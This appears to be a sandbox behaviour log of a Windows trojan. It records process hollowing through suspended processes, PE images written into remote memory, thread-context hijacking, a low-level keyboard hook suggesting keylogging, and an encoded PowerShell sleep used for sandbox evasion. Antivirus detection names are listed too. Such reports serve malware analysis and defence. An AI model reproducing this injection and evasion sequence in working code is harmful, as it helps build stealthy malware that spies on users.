buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞVcۚ7 ˆš7 ˆš7 ˆ.«üˆ„7 ˆ.«þˆ]7 ˆ.«ÿˆ¾7 ˆ—ʈœ7 ˆ¡i‰†7 ˆ E ‰ý6 ˆ i‰7 ˆ i ‰Æ7 ˆGÈ݈ž7 ˆGÈ܈›7 ˆGÈƈ™7 ˆš7 ˆß5 ˆn‰˜7 ˆGÈȟ7 ˆ¡i ‰°7 ˆ¡i‰7 ˆ i‰7 ˆ i‰›7 ˆRichš7 ˆPELòÓÛ`à ì-<ˆ¤(.@à<€D¤8(:¼I¬’4Р2@.Ô̆8€.textê-ì- `.rdata¶º .¼ ð-@@.dataœÀ8"¬8@À.gfidsø`:Î9@@.tls €:à9@À.reloc¼I:Jâ9@B
base_address: 0x00400000
process_identifier: 2920
process_handle: 0x00000374
1 1 0

WriteProcessMemory

buffer: €
base_address: 0x007a8000
process_identifier: 2920
process_handle: 0x00000374
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2920
process_handle: 0x00000374
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Z/.Nf}Nf}Nf}ªÒ—}Nf}ªÒ•}†Nf}ªÒ”}Nf}%e| Nf}%c|"Nf}%b|<Nf}ûc|Nf}ñ­}Nf}Ng}mNf}‰o|Nf}‰d|Nf}RichNf}PEL$î0_à VPž®p@ð@€,hxÀ\&€98:¸9@p˜.text{UV `.rdata„pZ@@.dataÈ€\@À.gfidsˆ l@@.tls °p@À.reloc\&À(r@B
base_address: 0x00400000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@B
base_address: 0x00400000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞVcۚ7 ˆš7 ˆš7 ˆ.«üˆ„7 ˆ.«þˆ]7 ˆ.«ÿˆ¾7 ˆ—ʈœ7 ˆ¡i‰†7 ˆ E ‰ý6 ˆ i‰7 ˆ i ‰Æ7 ˆGÈ݈ž7 ˆGÈ܈›7 ˆGÈƈ™7 ˆš7 ˆß5 ˆn‰˜7 ˆGÈȟ7 ˆ¡i ‰°7 ˆ¡i‰7 ˆ i‰7 ˆ i‰›7 ˆRichš7 ˆPELòÓÛ`à ì-<ˆ¤(.@à<€D¤8(:¼I¬’4Р2@.Ô̆8€.textê-ì- `.rdata¶º .¼ ð-@@.dataœÀ8"¬8@À.gfidsø`:Î9@@.tls €:à9@À.reloc¼I:Jâ9@B
base_address: 0x00400000
process_identifier: 2920
process_handle: 0x00000374
1 1 0
Time & API Arguments Status Return Repeated

SetWindowsHookExW

thread_identifier: 0
callback_function: 0x004ca8cc
hook_identifier: 13 (WH_KEYBOARD_LL)
module_address: 0x00000000
1 459193 0
Process injection Process 2548 called NtSetContextThread to modify thread in remote process 604
Process injection Process 604 called NtSetContextThread to modify thread in remote process 2248
Process injection Process 2248 called NtSetContextThread to modify thread in remote process 2920
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4239006
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 604
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 2096400
registers.edi: 0
registers.eax: 8908798
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002f8
process_identifier: 2248
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 6857864
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001c8
process_identifier: 2920
1 0 0
Process injection Process 2548 resumed a thread in remote process 604
Process injection Process 604 resumed a thread in remote process 2248
Process injection Process 2248 resumed a thread in remote process 2920
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000200
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

thread_handle: 0x000001c8
suspend_count: 1
process_identifier: 2920
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Bkav W32.AIDetectNet.01
Cyren W32/MSIL_Kryptik.IAJ.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
APEX Malicious
Kaspersky UDS:Trojan.MSIL.Scarsi.gen
McAfee-GW-Edition BehavesLike.Win32.Trojan.cm
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.54e5e90fbafdf6f0
Google Detected
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Cynet Malicious (score: 100)
McAfee Artemis!54E5E90FBAFD
VBA32 Downloader.MSIL.gen.rexp
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.300983.susgen
BitDefenderTheta Gen:NN.ZemsilF.34726.mm0@aK@FFgk
AVG CrypterX-gen [Trj]
Avast CrypterX-gen [Trj]
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x00000338
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x000001f8
suspend_count: 1
process_identifier: 2548
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtResumeThread

thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2548
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtSetContextThread

registers.eip: 1921133444
registers.esp: 4912108
registers.edi: 38226840
registers.eax: 8159216
registers.ebp: 4912140
registers.edx: 1019902
registers.ebx: 98635776
registers.esi: 57279232
registers.ecx: 672827
thread_handle: 0x000000e4
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x00000228
suspend_count: 1
process_identifier: 2548
1 0 0

CreateProcessInternalW

thread_identifier: 2712
thread_handle: 0x000004b0
process_identifier: 2708
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000004b8
1 1 0

CreateProcessInternalW

thread_identifier: 812
thread_handle: 0x00000200
process_identifier: 604
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\Rckjlz.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000224
1 1 0

NtGetContextThread

thread_handle: 0x00000200
1 0 0

NtAllocateVirtualMemory

process_identifier: 604
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000224
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Z/.Nf}Nf}Nf}ªÒ—}Nf}ªÒ•}†Nf}ªÒ”}Nf}%e| Nf}%c|"Nf}%b|<Nf}ûc|Nf}ñ­}Nf}Ng}mNf}‰o|Nf}‰d|Nf}RichNf}PEL$î0_à VPž®p@ð@€,hxÀ\&€98:¸9@p˜.text{UV `.rdata„pZ@@.dataÈ€\@À.gfidsˆ l@@.tls °p@À.reloc\&À(r@B
base_address: 0x00400000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00427000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00438000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer: Ìa±aV;fUfV£fV•ëVFL‡¦zšfBÅ1Å>IæHVV¥¤ø£]f)f@‡úböÄM—G—G\‹h7@8ǜ â}lÑ» Xì ªÍ€gÖá4>„?_^dŸ±oqoÐoÖJJêðïôðïðï ðï#$"JJ'o6o<#$"A@D#$"HGKoR^„ƒ‚€~}|{zyhg†•”“’‘~{ŽŒ‹œ¨ãÅÄÃÂÁðïÇcž°³îüû íäìäøää éêö9<8;ÊËÌÍÎÏÐÑÒÓÔ†…Ù†…  b Er4N]Z[ Y
base_address: 0x0043a000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer: €
base_address: 0x0043b000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0043c000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 604
process_handle: 0x00000224
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4239006
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 604
1 0 0

NtResumeThread

thread_handle: 0x00000200
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

thread_handle: 0x00000294
suspend_count: 1
process_identifier: 2708
1 0 0

NtResumeThread

thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 2708
1 0 0

NtResumeThread

thread_handle: 0x00000444
suspend_count: 1
process_identifier: 2708
1 0 0

NtResumeThread

thread_handle: 0x0000048c
suspend_count: 1
process_identifier: 2708
1 0 0

CreateProcessInternalW

thread_identifier: 2252
thread_handle: 0x000002f8
process_identifier: 2248
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\Rckjlz.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\Rckjlz.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000002e4
1 1 0

NtGetContextThread

thread_handle: 0x000002f8
1 0 0

NtAllocateVirtualMemory

process_identifier: 2248
region_size: 4923392
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002e4
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@B
base_address: 0x00400000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00402000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00880000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

buffer: ðG 0
base_address: 0x008b0000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 2096400
registers.edi: 0
registers.eax: 8908798
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002f8
process_identifier: 2248
1 0 0

NtResumeThread

thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

thread_handle: 0x000001cc
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

thread_handle: 0x000001c8
suspend_count: 1
process_identifier: 2248
1 0 0

NtGetContextThread

thread_handle: 0x00000150
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2248
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2248
1 0 0